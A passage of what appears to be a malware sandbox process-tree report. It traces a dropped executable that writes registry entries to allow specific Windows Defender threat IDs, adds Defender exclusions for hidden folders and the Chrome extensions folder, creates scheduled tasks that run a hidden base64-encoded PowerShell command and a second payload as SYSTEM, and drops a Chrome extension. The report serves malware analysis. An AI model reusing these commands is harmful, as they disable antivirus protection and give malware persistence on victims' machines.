                              • Program crash
                              PID:6076
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1736
                              4⤵
                              • Program crash
                              PID:884
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 2484
                              4⤵
                              • Program crash
                              PID:680
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1788 -s 1736
                              4⤵
                              • Program crash
                              PID:5488
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Drops file in Windows directory
                        • Modifies registry class
                        PID:4808
                      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                        1⤵
                        • Modifies registry class
                        PID:5652
                      • C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe
                        C:\Users\Admin\AppData\Local\Temp\L4amOxuk\XKhTvOD.exe z0 /badidB 757674 /S
                        1⤵
                        • Executes dropped EXE
                        • Drops desktop.ini file(s)
                        • Drops file in System32 directory
                        • Modifies data under HKEY_USERS
                        PID:5284
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                          2⤵
                          • Drops file in System32 directory
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:5304
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            3⤵
                              PID:5356
                              • C:\Windows\SysWOW64\reg.exe
                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                4⤵
                                  PID:5472
                              • C:\Windows\SysWOW64\reg.exe
                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                3⤵
                                  PID:5504
                                • C:\Windows\SysWOW64\reg.exe
                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                  3⤵
                                    PID:5496
                                  • C:\Windows\SysWOW64\reg.exe
                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                    3⤵
                                      PID:3588
                                    • C:\Windows\SysWOW64\reg.exe
                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                      3⤵
                                        PID:3012
                                      • C:\Windows\SysWOW64\reg.exe
                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                        3⤵
                                          PID:3520
                                        • C:\Windows\SysWOW64\reg.exe
                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                          3⤵
                                            PID:5292
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                            3⤵
                                              PID:5548
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                              3⤵
                                                PID:1048
                                              • C:\Windows\SysWOW64\reg.exe
                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                3⤵
                                                  PID:5544
                                                • C:\Windows\SysWOW64\reg.exe
                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                  3⤵
                                                    PID:3512
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                    3⤵
                                                      PID:2092
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                      3⤵
                                                        PID:3140
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                        3⤵
                                                          PID:4748
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                          3⤵
                                                            PID:5604
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                            3⤵
                                                              PID:5600
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                              3⤵
                                                                PID:2096
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                3⤵
                                                                  PID:1336
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                  3⤵
                                                                    PID:5732
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                    3⤵
                                                                      PID:2704
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                      3⤵
                                                                        PID:4092
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                        3⤵
                                                                          PID:5756
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                          3⤵
                                                                            PID:1216
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                            3⤵
                                                                              PID:244
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                              3⤵
                                                                                PID:5804
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                3⤵
                                                                                  PID:3400
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                  3⤵
                                                                                    PID:5596
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                    3⤵
                                                                                      PID:5948
                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"
                                                                                    2⤵
                                                                                    • Drops file in System32 directory
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:6004
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
                                                                                      3⤵
                                                                                        PID:6076
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:32
                                                                                          4⤵
                                                                                            PID:5808
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:64
                                                                                          3⤵
                                                                                            PID:5848
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:32
                                                                                            3⤵
                                                                                              PID:3600
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:64
                                                                                              3⤵
                                                                                                PID:6108
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:32
                                                                                                3⤵
                                                                                                  PID:1164
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:64
                                                                                                  3⤵
                                                                                                    PID:3224
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:32
                                                                                                    3⤵
                                                                                                      PID:3952
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:64
                                                                                                      3⤵
                                                                                                        PID:1908
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:32
                                                                                                        3⤵
                                                                                                          PID:5768
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:64
                                                                                                          3⤵
                                                                                                            PID:4940
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:32
                                                                                                            3⤵
                                                                                                              PID:1332
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:64
                                                                                                              3⤵
                                                                                                                PID:5592
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                                                                                3⤵
                                                                                                                  PID:460
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:5144
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:32
                                                                                                                    3⤵
                                                                                                                      PID:1888
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2400
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:32
                                                                                                                        3⤵
                                                                                                                          PID:5232
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:64
                                                                                                                          3⤵
                                                                                                                            PID:2524
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /CREATE /TN "gRknkcelR" /SC once /ST 04:47:02 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                                                                          2⤵
                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                          PID:4276
                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                          schtasks /run /I /tn "gRknkcelR"
                                                                                                                          2⤵
                                                                                                                            PID:852
                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                            schtasks /DELETE /F /TN "gRknkcelR"
                                                                                                                            2⤵
                                                                                                                              PID:2200
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /CREATE /TN "FPIEUdZLMYPzsiUNM" /SC once /ST 00:17:12 /RU "SYSTEM" /TR "\"C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe\" Wy /GCDxdidHR 757674 /S" /V1 /F
                                                                                                                              2⤵
                                                                                                                              • Drops file in Windows directory
                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                              PID:5860
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /run /I /tn "FPIEUdZLMYPzsiUNM"
                                                                                                                              2⤵
                                                                                                                                PID:6080
                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 776
                                                                                                                                2⤵
                                                                                                                                • Program crash
                                                                                                                                PID:5840
                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                              1⤵
                                                                                                                              • Command and Scripting Interpreter: PowerShell
                                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                              PID:4400
                                                                                                                              • C:\Windows\system32\gpupdate.exe
                                                                                                                                "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                2⤵
                                                                                                                                  PID:5544
                                                                                                                              • \??\c:\windows\system32\svchost.exe
                                                                                                                                c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
                                                                                                                                1⤵
                                                                                                                                  PID:5732
                                                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                                                  C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                                                                                                  1⤵
                                                                                                                                    PID:5740
                                                                                                                                  • C:\Windows\system32\gpscript.exe
                                                                                                                                    gpscript.exe /RefreshSystemParam
                                                                                                                                    1⤵
                                                                                                                                      PID:5772
                                                                                                                                    • C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe
                                                                                                                                      C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe Wy /GCDxdidHR 757674 /S
                                                                                                                                      1⤵
                                                                                                                                      • Checks computer location settings
                                                                                                                                      • Executes dropped EXE
                                                                                                                                      • Drops Chrome extension
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Drops file in Program Files directory
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                                      PID:6076
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "bEtnHIcecDUtXwQuWS"
                                                                                                                                        2⤵
                                                                                                                                          PID:2368
